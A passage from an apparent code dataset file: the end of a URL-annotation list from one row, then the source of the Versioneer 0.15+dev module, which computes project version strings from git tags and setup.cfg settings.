'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 'sharesix.com'], ['URL', 'streamcloud.eu'], ['URL', 'self.do'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'xbmc.sl'], ['URL', 'self.do'], ['URL', 'vidhog.com'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'xbmc.sl'], ['URL', 'self.do'], ['URL', 'vidto.me'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 
'xbmc.sl'], ['URL', 'self.do'], ['URL', 'vodlocker.com'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'xbmc.sl'], ['URL', 'self.do'], ['URL', 'hcbit.com'], ['URL', 'e.co'], ['URL', 'response.in'], ['URL', 'response.in'], ['URL', 're.DO'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'bestreams.net'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'xbmc.sl'], ['URL', 'self.us'], ['URL', 'self.do'], ['URL', 'thevideo.me'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'vidzi.tv'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'e.co'], ['URL', 'response.re'], ['URL', 'response.cl'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 'thefile.me'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'sharerepo.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'filenuke.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'sharerepo.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'letwatch.us'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'thevideo.me'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'vidto.me'], ['URL', 're.fi'], ['URL', 'allmyvideos.net'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'realvid.net'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'uptobox.com'], ['URL', 'self.do'], ['URL', 'uptostream.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.DO'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'xbmc.sl'], ['URL', 'e.co'], ['URL', 'response.re'], ['URL', 'response.cl'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'response.co'], ['URL', 'response.ms'], ['URL', 'response.in'], ['URL', 'self.parent.er']]"
108,"
# Version: 0.15+dev
""""""The Versioneer - like a rocketeer, but for versions.
The Versioneer
==============
* like a rocketeer, but for versions!
* https://github.com/warner/python-versioneer
* Brian Warner
* License: Public Domain
* Compatible With: python2.6, 2.7, 3.2, 3.3, 3.4, and pypy
* [![Latest Version]
(https://pypip.in/version/versioneer/badge.svg?style=flat)
](https://pypi.python.org/pypi/versioneer/)
* [![Build Status]
(https://travis-ci.org/warner/python-versioneer.png?branch=master)
](https://travis-ci.org/warner/python-versioneer)
This is a tool for managing a recorded version number in distutils-based
python projects. The goal is to remove the tedious and error-prone ""update
the embedded version string"" step from your release process. Making a new
release should be as easy as recording a new tag in your version-control
system, and maybe making new tarballs.
## Quick Install
* `pip install versioneer` to somewhere to your $PATH
* add a `[versioneer]` section to your setup.cfg (see below)
* run `versioneer install` in your source tree, commit the results
## Version Identifiers
Source trees come from a variety of places:
* a version-control system checkout (mostly used by developers)
* a nightly tarball, produced by build automation
* a snapshot tarball, produced by a web-based VCS browser, like github's
""tarball from tag"" feature
* a release tarball, produced by ""setup.py sdist"", distributed through PyPI
Within each source tree, the version identifier (either a string or a number,
this tool is format-agnostic) can come from a variety of places:
* ask the VCS tool itself, e.g. ""git describe"" (for checkouts), which knows
about recent ""tags"" and an absolute revision-id
* the name of the directory into which the tarball was unpacked
* an expanded VCS keyword ($Id$, etc)
* a `_version.py` created by some earlier build step
For released software, the version identifier is closely related to a VCS
tag. Some projects use tag names that include more than just the version
string (e.g. ""myproject-1.2"" instead of just ""1.2""), in which case the tool
needs to strip the tag prefix to extract the version identifier. For
unreleased software (between tags), the version identifier should provide
enough information to help developers recreate the same tree, while also
giving them an idea of roughly how old the tree is (after version 1.2, before
version 1.3). Many VCS systems can report a description that captures this,
for example `git describe --tags --dirty --always` reports things like
""0.7-1-g574ab98-dirty"" to indicate that the checkout is one revision past the
0.7 tag, has a unique revision id of ""574ab98"", and is ""dirty"" (it has
uncommitted changes).
The version identifier is used for multiple purposes:
* to allow the module to self-identify its version: `myproject.__version__`
* to choose a name and prefix for a 'setup.py sdist' tarball
## Theory of Operation
Versioneer works by adding a special `_version.py` file into your source
tree, where your `__init__.py` can import it. This `_version.py` knows how to
dynamically ask the VCS tool for version information at import time.
`_version.py` also contains `$Revision$` markers, and the installation
process marks `_version.py` to have this marker rewritten with a tag name
during the `git archive` command. As a result, generated tarballs will
contain enough information to get the proper version.
To allow `setup.py` to compute a version too, a `versioneer.py` is added to
the top level of your source tree, next to `setup.py` and the `setup.cfg`
that configures it. This overrides several distutils/setuptools commands to
compute the version when invoked, and changes `setup.py build` and `setup.py
sdist` to replace `_version.py` with a small static file that contains just
the generated version data.
## Installation
First, decide on values for the following configuration variables:
* `VCS`: the version control system you use. Currently accepts ""git"".
* `style`: the style of version string to be produced. See ""Styles"" below for
details. Defaults to ""pep440"", which looks like
`TAG[+DISTANCE.gSHORTHASH[.dirty]]`.
* `versionfile_source`:
A project-relative pathname into which the generated version strings should
be written. This is usually a `_version.py` next to your project's main
`__init__.py` file, so it can be imported at runtime. If your project uses
`src/myproject/__init__.py`, this should be `src/myproject/_version.py`.
This file should be checked in to your VCS as usual: the copy created below
by `setup.py setup_versioneer` will include code that parses expanded VCS
keywords in generated tarballs. The 'build' and 'sdist' commands will
replace it with a copy that has just the calculated version string.
This must be set even if your project does not have any modules (and will
therefore never import `_version.py`), since ""setup.py sdist"" -based trees
still need somewhere to record the pre-calculated version strings. Anywhere
in the source tree should do. If there is a `__init__.py` next to your
`_version.py`, the `setup.py setup_versioneer` command (described below)
will append some `__version__`-setting assignments, if they aren't already
present.
* `versionfile_build`:
Like `versionfile_source`, but relative to the build directory instead of
the source directory. These will differ when your setup.py uses
'package_dir='. If you have `package_dir={'myproject': 'src/myproject'}`,
then you will probably have `versionfile_build='myproject/_version.py'` and
`versionfile_source='src/myproject/_version.py'`.
If this is set to None, then `setup.py build` will not attempt to rewrite
any `_version.py` in the built tree. If your project does not have any
libraries (e.g. if it only builds a script), then you should use
`versionfile_build = None`. To actually use the computed version string,
your `setup.py` will need to override `distutils.command.build_scripts`
with a subclass that explicitly inserts a copy of
`versioneer.get_version()` into your script file. See
`test/demoapp-script-only/setup.py` for an example.
* `tag_prefix`:
a string, like 'PROJECTNAME-', which appears at the start of all VCS tags.
If your tags look like 'myproject-1.2.0', then you should use
tag_prefix='myproject-'. If you use unprefixed tags like '1.2.0', this
should be an empty string, using either `tag_prefix=` or `tag_prefix=''`.
* `parentdir_prefix`:
an optional string, frequently the same as tag_prefix, which appears at the
start of all unpacked tarball filenames. If your tarball unpacks into
'myproject-1.2.0', this should be 'myproject-'. To disable this feature,
just omit the field from your `setup.cfg`.
This tool provides one script, named `versioneer`. That script has one mode,
""install"", which writes a copy of `versioneer.py` into the current directory
and runs `versioneer.py setup` to finish the installation.
To versioneer-enable your project:
* 1: Modify your `setup.cfg`, adding a section named `[versioneer]` and
populating it with the configuration values you decided earlier (note that
the option names are not case-sensitive):
````
[versioneer]
VCS = git
style = pep440
versionfile_source = src/myproject/_version.py
versionfile_build = myproject/_version.py
tag_prefix =
parentdir_prefix = myproject-
````
* 2: Run `versioneer install`. This will do the following:
* copy `versioneer.py` into the top of your source tree
* create `_version.py` in the right place (`versionfile_source`)
* modify your `__init__.py` (if one exists next to `_version.py`) to define
`__version__` (by calling a function from `_version.py`)
* modify your `MANIFEST.in` to include both `versioneer.py` and the
generated `_version.py` in sdist tarballs
`versioneer install` will complain about any problems it finds with your
`setup.py` or `setup.cfg`. Run it multiple times until you have fixed all
the problems.
* 3: add a `import versioneer` to your setup.py, and add the following
arguments to the setup() call (a minimal example follows this list):
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
* 4: commit these changes to your VCS. To make sure you won't forget,
`versioneer install` will mark everything it touched for addition using
`git add`. Don't forget to add `setup.py` and `setup.cfg` too.
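For reference, a minimal `setup.py` wired up this way might look like (the
project name is hypothetical):
import versioneer
from setuptools import setup
setup(name='myproject',
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass())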
## Post-Installation Usage
Once established, all uses of your tree from a VCS checkout should get the
current version string. All generated tarballs should include an embedded
version string (so users who unpack them will not need a VCS tool installed).
If you distribute your project through PyPI, then the release process should
boil down to two steps:
* 1: git tag 1.0
* 2: python setup.py register sdist upload
If you distribute it through github (i.e. users use github to generate
tarballs with `git archive`), the process is:
* 1: git tag 1.0
* 2: git push; git push --tags
Versioneer will report ""0+untagged.NUMCOMMITS.gHASH"" until your tree has at
least one tag in its history.
## Version-String Flavors
Code which uses Versioneer can learn about its version string at runtime by
importing `_version` from your main `__init__.py` file and running the
`get_versions()` function. From the ""outside"" (e.g. in `setup.py`), you can
import the top-level `versioneer.py` and run `get_versions()`.
Both functions return a dictionary with different flavors of version
information:
* `['version']`: A condensed version string, rendered using the selected
style. This is the most commonly used value for the project's version
string. The default ""pep440"" style yields strings like `0.11`,
`0.11+2.g1076c97`, or `0.11+2.g1076c97.dirty`. See the ""Styles"" section
below for alternative styles.
* `['full-revisionid']`: detailed revision identifier. For Git, this is the
full SHA1 commit id, e.g. ""PI:KEY"".
* `['dirty']`: a boolean, True if the tree has uncommitted changes. Note that
this is only accurate if run in a VCS checkout, otherwise it is likely to
be False or None
* `['error']`: if the version string could not be computed, this will be set
to a string describing the problem, otherwise it will be None. It may be
useful to throw an exception in setup.py if this is set, to avoid e.g.
creating tarballs with a version string of ""unknown"".
Some variants are more useful than others. Including `full-revisionid` in a
bug report should allow developers to reconstruct the exact code being tested
(or indicate the presence of local changes that should be shared with the
developers). `version` is suitable for display in an ""about"" box or a CLI
`--version` output: it can be easily compared against release notes and lists
of bugs fixed in various releases.
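As a quick sketch, a checkout two commits past a `0.11` tag with local edits
might report (SHA1 abbreviated here):
import versioneer
versioneer.get_versions()
# => {'version': '0.11+2.g1076c97.dirty',
#     'full-revisionid': '1076c97...',
#     'dirty': True, 'error': None}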
The installer adds the following text to your `__init__.py` to place a basic
version in `YOURPROJECT.__version__`:
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
## Styles
The setup.cfg `style=` configuration controls how the VCS information is
rendered into a version string.
The default style, ""pep440"", produces a PEP440-compliant string, equal to the
un-prefixed tag name for actual releases, and containing an additional ""local
version"" section with more detail for in-between builds. For Git, this is
TAG[+DISTANCE.gHEX[.dirty]] , using information from `git describe --tags
--dirty --always`. For example ""0.11+2.g1076c97.dirty"" indicates that the
tree is like the ""1076c97"" commit but has uncommitted changes ("".dirty""), and
that this commit is two revisions (""+2"") beyond the ""0.11"" tag. For released
software (exactly equal to a known tag), the identifier will only contain the
stripped tag, e.g. ""0.11"".
Other styles are available. See details.md in the Versioneer source tree for
descriptions.
## Debugging
Versioneer tries to avoid fatal errors: if something goes wrong, it will tend
to return a version of ""0+unknown"". To investigate the problem, run `setup.py
version`, which will run the version-lookup code in a verbose mode, and will
display the full contents of `get_versions()` (including the `error` string,
which may help identify what went wrong).
## Updating Versioneer
To upgrade your project to a new release of Versioneer, do the following:
* install the new Versioneer (`pip install -U versioneer` or equivalent)
* edit `setup.cfg`, if necessary, to include any new configuration settings
indicated by the release notes
* re-run `versioneer install` in your source tree, to replace
`SRC/_version.py`
* commit any changed files
### Upgrading to 0.15
Starting with this version, Versioneer is configured with a `[versioneer]`
section in your `setup.cfg` file. Earlier versions required the `setup.py` to
set attributes on the `versioneer` module immediately after import. The new
version will refuse to run (raising an exception during import) until you
have provided the necessary `setup.cfg` section.
In addition, the Versioneer package provides an executable named
`versioneer`, and the installation process is driven by running `versioneer
install`. In 0.14 and earlier, the executable was named
`versioneer-installer` and was run without an argument.
### Upgrading to 0.14
0.14 changes the format of the version string. 0.13 and earlier used
hyphen-separated strings like ""0.11-2-g1076c97-dirty"". 0.14 and beyond use a
plus-separated ""local version"" section strings, with dot-separated
components, like ""0.11+2.g1076c97"". PEP440-strict tools did not like the old
format, but should be ok with the new one.
### Upgrading from 0.11 to 0.12
Nothing special.
### Upgrading from 0.10 to 0.11
You must add a `versioneer.VCS = ""git""` to your `setup.py` before re-running
`setup.py setup_versioneer`. This will enable the use of additional
version-control systems (SVN, etc) in the future.
## Future Directions
This tool is designed to be easily extended to other version-control
systems: all VCS-specific components are in separate directories like
src/git/ . The top-level `versioneer.py` script is assembled from these
components by running make-versioneer.py . In the future, make-versioneer.py
will take a VCS name as an argument, and will construct a version of
`versioneer.py` that is specific to the given VCS. It might also take the
configuration arguments that are currently provided manually during
installation by editing setup.py . Alternatively, it might go the other
direction and include code from all supported VCS systems, reducing the
number of intermediate scripts.
## License
To make Versioneer easier to embed, all its code is dedicated to the public
domain. The `_version.py` that it creates is also in the public domain.
Specifically, both are released under the Creative Commons ""Public Domain
Dedication"" license (CC0-1.0), as described in
https://creativecommons.org/publicdomain/zero/1.0/ .
""""""
from __future__ import print_function
try:
import configparser
except ImportError:
import ConfigParser as configparser
import errno
import json
import os
import re
import subprocess
import sys
class VersioneerConfig:
""""""Container for Versioneer configuration parameters.""""""
def get_root():
""""""Get the project root directory.
We require that all commands are run from the project root, i.e. the
directory that contains setup.py, setup.cfg, and versioneer.py .
""""""
root = os.path.realpath(os.path.abspath(os.getcwd()))
setup_py = os.path.join(root, ""setup.py"")
versioneer_py = os.path.join(root, ""versioneer.py"")
if not (os.path.exists(setup_py) or os.path.exists(versioneer_py)):
# allow 'python path/to/setup.py COMMAND'
root = os.path.dirname(os.path.realpath(os.path.abspath(sys.argv[0])))
setup_py = os.path.join(root, ""setup.py"")
versioneer_py = os.path.join(root, ""versioneer.py"")
if not (os.path.exists(setup_py) or os.path.exists(versioneer_py)):
err = (""Versioneer was unable to run the project root directory. ""
""Versioneer requires setup.py to be executed from ""
""its immediate directory (like 'python setup.py COMMAND'), ""
""or in a way that lets it use sys.argv[0] to find the root ""
""(like 'python path/to/setup.py COMMAND')."")
raise VersioneerBadRootError(err)
try:
# Certain runtime workflows (setup.py install/develop in a setuptools
# tree) execute all dependencies in a single python process, so
# ""versioneer"" may be imported multiple times, and python's shared
# module-import table will cache the first one. So we can't use
# os.path.dirname(__file__), as that will find whichever
# versioneer.py was first imported, even in later projects.
me = os.path.realpath(os.path.abspath(__file__))
if os.path.splitext(me)[0] != os.path.splitext(versioneer_py)[0]:
print(""Warning: build in %s is using versioneer.py from %s""
% (os.path.dirname(me), versioneer_py))
except NameError:
pass
return root
def get_config_from_root(root):
""""""Read the project setup.cfg file to determine Versioneer config.""""""
# This might raise EnvironmentError (if setup.cfg is missing), or
# configparser.NoSectionError (if it lacks a [versioneer] section), or
# configparser.NoOptionError (if it lacks ""VCS=""). See the docstring at
# the top of versioneer.py for instructions on writing your setup.cfg .
setup_cfg = os.path.join(root, ""setup.cfg"")
parser = configparser.SafeConfigParser()
with open(setup_cfg, ""r"") as f:
parser.readfp(f)
VCS = parser.get(""versioneer"", ""VCS"") # mandatory
def get(parser, name):
if parser.has_option(""versioneer"", name):
return parser.get(""versioneer"", name)
return None
cfg = VersioneerConfig()
cfg.VCS = VCS
cfg.style = get(parser, ""style"") or """"
cfg.versionfile_source = get(parser, ""versionfile_source"")
cfg.versionfile_build = get(parser, ""versionfile_build"")
cfg.tag_prefix = get(parser, ""tag_prefix"")
if cfg.tag_prefix in (""''"", '""""'):
cfg.tag_prefix = """"
cfg.parentdir_prefix = get(parser, ""parentdir_prefix"")
cfg.verbose = get(parser, ""verbose"")
return cfg
class NotThisMethod(Exception):
""""""Exception raised if a method is not valid for the current scenario.""""""
# these dictionaries contain VCS-specific tools
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
""""""Decorator to mark a method as the handler for a particular VCS.""""""
def decorate(f):
""""""Store f in HANDLERS[vcs][method].""""""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
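# Example (sketch): a function defined below under
# @register_vcs_handler(""git"", ""get_keywords"") becomes reachable as
# HANDLERS[""git""][""get_keywords""], so VCS-specific logic is dispatched by
# name instead of being hard-coded.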
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False):
""""""Call the given command(s).""""""
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen([c] + args, cwd=cwd, stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr
else None))
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print(""unable to run %s"" % dispcmd)
print(e)
return None
else:
if verbose:
print(""unable to find command, tried %s"" % (commands,))
return None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print(""unable to run %s (error)"" % dispcmd)
return None
return stdout
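# Example (sketch): run_command([""git""], [""describe"", ""--tags""], cwd=root)
# returns the command's stdout as a stripped string, or None when the
# executable is missing or it exits non-zero.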
LONG_VERSION_PY['git'] = r'''
# This file helps to compute a version number in source trees obtained from
# git-archive tarball (such as those provided by githubs download-from-tag
# feature). Distribution tarballs (built by setup.py sdist) and build
# directories (produced by setup.py build) will contain a much shorter file
# that just contains the computed version number.
# This file is released into the public domain. Generated by
# versioneer-0.15+dev (https://github.com/warner/python-versioneer)
""""""Git implementation of _version.py.""""""
import errno
import os
import re
import subprocess
import sys
def get_keywords():
""""""Get the keywords needed to look up the version information.""""""
# these strings will be replaced by git during git-archive.
# setup.py/versioneer.py will grep for the variable names, so they must
# each be defined on a line of their own. _version.py will just call
# get_keywords().
git_refnames = ""%(DOLLAR)sFormat:%%d%(DOLLAR)s""
git_full = ""%(DOLLAR)sFormat:%%H%(DOLLAR)s""
keywords = {""refnames"": git_refnames, ""full"": git_full}
return keywords
class VersioneerConfig:
""""""Container for Versioneer configuration parameters.""""""
def get_config():
""""""Create, populate and return the VersioneerConfig() object.""""""
# these strings are filled in when 'setup.py versioneer' creates
# _version.py
cfg = VersioneerConfig()
cfg.VCS = ""git""
cfg.style = ""%(STYLE)s""
cfg.tag_prefix = ""%(TAG_PREFIX)s""
cfg.parentdir_prefix = ""%(PARENTDIR_PREFIX)s""
cfg.versionfile_source = ""%(VERSIONFILE_SOURCE)s""
cfg.verbose = False
return cfg
class NotThisMethod(Exception):
""""""Exception raised if a method is not valid for the current scenario.""""""
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
""""""Decorator to mark a method as the handler for a particular VCS.""""""
def decorate(f):
""""""Store f in HANDLERS[vcs][method].""""""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False):
""""""Call the given command(s).""""""
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen([c] + args, cwd=cwd, stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr
else None))
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print(""unable to run %%s"" %% dispcmd)
print(e)
return None
else:
if verbose:
print(""unable to find command, tried %%s"" %% (commands,))
return None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print(""unable to run %%s (error)"" %% dispcmd)
return None
return stdout
def versions_from_parentdir(parentdir_prefix, root, verbose):
""""""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes
both the project name and a version string.
""""""
dirname = os.path.basename(root)
if not dirname.startswith(parentdir_prefix):
if verbose:
print(""guessing rootdir is '%%s', but '%%s' doesn't start with ""
""prefix '%%s'"" %% (root, dirname, parentdir_prefix))
raise NotThisMethod(""rootdir doesn't start with parentdir_prefix"")
return {""version"": dirname[len(parentdir_prefix):],
""full-revisionid"": None,
""dirty"": False, ""error"": None}
@register_vcs_handler(""git"", ""get_keywords"")
def git_get_keywords(versionfile_abs):
""""""Extract version information from the given file.""""""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, ""r"")
for line in f.readlines():
if line.strip().startswith(""git_refnames =""):
mo = re.search(r'=\s*""(.*)""', line)
if mo:
keywords[""refnames""] = mo.group(1)
if line.strip().startswith(""git_full =""):
mo = re.search(r'=\s*""(.*)""', line)
if mo:
keywords[""full""] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler(""git"", ""keywords"")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
""""""Get version information from git keywords.""""""
if not keywords:
raise NotThisMethod(""no keywords at all, weird"")
refnames = keywords[""refnames""].strip()
if refnames.startswith(""$Format""):
if verbose:
print(""keywords are unexpanded, not using"")
raise NotThisMethod(""unexpanded keywords, not a git-archive tarball"")
refs = [r.strip() for r in refnames.strip(""()"").split("","")]
# starting in git-1.8.3, tags are listed as ""tag: foo-1.0"" instead of
# just ""foo-1.0"". If we see a ""tag: "" prefix, prefer those.
TAG = ""tag: ""
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %%d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like ""release"" and
# ""stabilization"", as well as ""HEAD"" and ""master"".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print(""discarding '%%s', no digits"" %% "","".join(set(refs) - tags))
if verbose:
print(""likely tags: %%s"" %% "","".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. ""2.0"" over ""2.0rc1""
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print(""picking %%s"" %% r)
return {""version"": r,
""full-revisionid"": keywords[""full""].strip(),
""dirty"": False, ""error"": None, ""branch"": None
}
# no suitable tags, so version is ""0+unknown"", but full hex is still there
if verbose:
print(""no suitable tags, using unknown + full revision id"")
return {""version"": ""0+unknown"",
""full-revisionid"": keywords[""full""].strip(),
""dirty"": False, ""error"": ""no suitable tags"",
""branch"": None}
@register_vcs_handler(""git"", ""pieces_from_vcs"")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
""""""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py hasn't already been rewritten with a short
version string, meaning we're inside a checked out source tree.
""""""
if not os.path.exists(os.path.join(root, "".git"")):
if verbose:
print(""no .git in %%s"" %% root)
raise NotThisMethod(""no .git directory"")
GITS = [""git""]
if sys.platform == ""win32"":
GITS = [""git.cmd"", ""git.exe""]
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there isn't one, this yields HEX[-dirty] (no NUM). Note, for git v1.7
# and below, it is necessary to run ""git update-index --refresh"" first.
describe_out = run_command(GITS, [""describe"", ""--tags"", ""--dirty"",
""--always"", ""--long"",
""--match"", ""%%s*"" %% tag_prefix],
cwd=root)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod(""'git describe' failed"")
describe_out = describe_out.strip()
full_out = run_command(GITS, [""rev-parse"", ""HEAD""], cwd=root)
if full_out is None:
raise NotThisMethod(""'git rev-parse' failed"")
full_out = full_out.strip()
pieces = {}
pieces[""long""] = full_out
pieces[""short""] = full_out[:7] # maybe improved later
pieces[""error""] = None
# abbrev-ref available with git >= 1.7
branch_name = run_command(GITS, [""rev-parse"", ""--abbrev-ref"", ""HEAD""],
cwd=root).strip()
if branch_name == 'HEAD':
branches = run_command(GITS, [""branch"", ""--contains""],
cwd=root).split('\n')
branches = [branch[2:] for branch in branches if branch[4:5] != '(']
if 'master' in branches:
branch_name = 'master'
elif not branches:
branch_name = None
else:
# Pick the first branch that is returned. Good or bad.
branch_name = branches[0]
pieces['branch'] = branch_name
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith(""-dirty"")
pieces[""dirty""] = dirty
if dirty:
git_describe = git_describe[:git_describe.rindex(""-dirty"")]
# now we have TAG-NUM-gHEX or HEX
if ""-"" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces[""error""] = (""unable to parse git-describe output: '%%s'""
%% describe_out)
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = ""tag '%%s' doesn't start with prefix '%%s'""
print(fmt %% (full_tag, tag_prefix))
pieces[""error""] = (""tag '%%s' doesn't start with prefix '%%s'""
%% (full_tag, tag_prefix))
return pieces
pieces[""closest-tag""] = full_tag[len(tag_prefix):]
# distance: number of commits since tag
pieces[""distance""] = int(mo.group(2))
# commit: short hex revision ID
pieces[""short""] = mo.group(3)
else:
# HEX: no tags
pieces[""closest-tag""] = None
count_out = run_command(GITS, [""rev-list"", ""HEAD"", ""--count""],
cwd=root)
pieces[""distance""] = int(count_out) # total number of commits
return pieces
# Default matches v1.2.x, maint/1.2.x, 1.2.x, 1.x etc.
default_maint_branch_regexp = "".*([0-9]+\.)+x$""
def plus_or_dot(pieces):
""""""Return a + if we don't already have one, else return a .""""""
if ""+"" in pieces.get(""closest-tag"", """"):
return "".""
return ""+""
def render_pep440(pieces):
""""""Build up version string, with post-release ""local version identifier"".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
""""""
if pieces[""closest-tag""]:
rendered = pieces[""closest-tag""]
if pieces[""distance""] or pieces[""dirty""]:
rendered += plus_or_dot(pieces)
rendered += ""%%d.g%%s"" %% (pieces[""distance""], pieces[""short""])
if pieces[""dirty""]:
rendered += "".dirty""
else:
# exception #1
rendered = ""0+untagged.%%d.g%%s"" %% (pieces[""distance""],
pieces[""short""])
if pieces[""dirty""]:
rendered += "".dirty""
return rendered
def render_pep440_pre(pieces):
""""""TAG[.post.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post.devDISTANCE
""""""
if pieces[""closest-tag""]:
rendered = pieces[""closest-tag""]
if pieces[""distance""]:
rendered += "".post.dev%%d"" %% pieces[""distance""]
else:
# exception #1
rendered = ""0.post.dev%%d"" %% pieces[""distance""]
return rendered
def render_pep440_post(pieces):
""""""TAG[.postDISTANCE[.dev0]+gHEX] .
The "".dev0"" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear ""older"" than the corresponding clean one),
but you shouldn't be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
""""""
if pieces[""closest-tag""]:
rendered = pieces[""closest-tag""]
if pieces[""distance""] or pieces[""dirty""]:
rendered += "".post%%d"" %% pieces[""distance""]
if pieces[""dirty""]:
rendered += "".dev0""
rendered += plus_or_dot(pieces)
rendered += ""g%%s"" %% pieces[""short""]
else:
# exception #1
rendered = ""0.post%%d"" %% pieces[""distance""]
if pieces[""dirty""]:
rendered += "".dev0""
rendered += ""+g%%s"" %% pieces[""short""]
return rendered
def render_pep440_old(pieces):
""""""TAG[.postDISTANCE[.dev0]] .
The "".dev0"" means dirty.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
""""""
if pieces[""closest-tag""]:
rendered = pieces[""closest-tag""]
if pieces[""distance""] or pieces[""dirty""]:
rendered += "".post%%d"" %% pieces[""distance""]
if pieces[""dirty""]:
rendered += "".dev0""
else:
# exception #1
rendered = ""0.post%%d"" %% pieces[""distance""]
if pieces[""dirty""]:
rendered += "".dev0""
return rendered
def render_git_describe(pieces):
""""""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
""""""
if pieces[""closest-tag""]:
rendered = pieces[""closest-tag""]
if pieces[""distance""]:
rendered += ""-%%d-g%%s"" %% (pieces[""distance""], pieces[""short""])
else:
# exception #1
rendered = pieces[""short""]
if pieces[""dirty""]:
rendered += ""-dirty""
return rendered
def render_git_describe_long(pieces):
""""""TAG-DISTANCE-gHEX[-dirty].
Like 'git describe --tags --dirty --always -long'.
